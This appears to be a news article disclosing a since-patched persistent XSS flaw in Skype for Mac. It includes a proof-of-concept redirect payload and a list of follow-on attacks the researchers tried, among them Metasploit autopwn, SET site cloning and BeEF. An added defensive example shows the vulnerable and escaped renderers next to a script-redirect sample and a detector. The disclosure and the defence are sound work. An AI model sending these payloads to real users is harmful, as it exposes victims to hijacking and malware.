Skype has now released an updated version with the issue addressed. With that version now widely available, Pure Hacking has decided to discuss the issue in detail.
The bug is a persistent XSS (cross-site scripting) vulnerability that would allow an attacker to redirect a victim's PC to any website of the attacker's choosing (which will almost certainly contain some kind of anti-social software!).
According to the statement by Gordon Maddern of Pure Hacking, it is caused by Skype failing to sanitize a message before the client renders the message. It is persistent because it is stored in the user's chat history and the payload is re-executed every time the contact is clicked. It requires no user interaction and can be triggered just by sending a message. As far as we could tell there was no setting to prevent this. The following proof of concept demonstrates this:
https://www.example.com/?foo=">document.location='https://10.11.1.225';
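The statement above names the missing step: the client rendered stored chat text as markup instead of as text. The following is an added example, not code from Skype, Pure Hacking or iTWire, showing the vulnerable rendering pattern beside its hardened form, a check that the hardened output carries no live script, and a small scanner a defender could run over a stored history to find messages containing markup. It assumes a web-view style renderer that builds HTML strings; the sample history and the attacker.invalid host are constructed for the example.

```javascript
// Added example, not Skype's or Pure Hacking's code. It shows the rendering
// step the article says was missing: a chat client must HTML-escape a stored
// message before inserting it into the view, otherwise a message carrying
// markup runs every time the history is displayed.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can switch HTML or attribute context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: untrusted message body interpolated straight into markup.
function renderMessageUnsafe(sender, body) {
  return `<div class="msg"><b>${sender}</b>: ${body}</div>`;
}

// Hardened pattern: only the wrapper is trusted; sender and body are escaped.
function renderMessageSafe(sender, body) {
  return `<div class="msg"><b>${escapeHtml(sender)}</b>: ${escapeHtml(body)}</div>`;
}

// Defender's check on rendered output: does it still contain a live <script>
// tag or an inline event handler attribute? Meant for tests and review,
// not as a runtime filter (escaping on render is the fix).
function hasLiveScript(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Simple history scanner: returns stored messages whose body contains a tag
// or a javascript: URL, so an analyst can find a stored payload after the
// fact. A heuristic for triage only; a plain "2 < 3" is not flagged.
function scanHistory(messages) {
  const suspicious = /<[a-z!\/]|javascript:/i;
  return messages.filter((m) => suspicious.test(m.body));
}

// Constructed sample history (not real Skype data). Message 2 mimics the
// shape of the article's proof of concept: an attribute break-out followed
// by a script that redirects the client to a hypothetical host.
const SAMPLE_HISTORY = [
  { id: 1, sender: 'alice', body: 'hi, are you around?' },
  { id: 2, sender: 'mallory', body: '"><script>document.location=\'https://attacker.invalid\'</script>' },
  { id: 3, sender: 'bob', body: '2 < 3 and 3 > 2, maths still works' },
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const m of SAMPLE_HISTORY) {
    console.log('unsafe :', renderMessageUnsafe(m.sender, m.body));
    console.log('safe   :', renderMessageSafe(m.sender, m.body));
  }
  console.log('flagged:', scanHistory(SAMPLE_HISTORY).map((m) => m.id));
}
```

Run with `node` to see both renderings side by side: the unsafe output for message 2 contains a real `<script>` element, while the safe output shows the same text as `&lt;script&gt;` and the scanner flags only message 2. In a real client the same rule applies to every place chat text reaches the view, including contact names and tooltips, and using the DOM's `textContent` rather than building HTML strings removes the escaping step entirely.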
The success of this attack is up to the attacker's imagination. Some of the examples Pure Hacking tested were:
1) Using a browser exploit to execute shellcode
2) Using Metasploit's browser autopwn
3) Using SET to clone the skype.com website, so the victim was redirected to what looked like the Skype website, and running a malicious Java applet
4) Using BeEF to hook in a zombie
5) Using the JavaScript attack API
If readers use Skype on a Mac and haven't yet downloaded the latest version, iTWire suggests they do so immediately.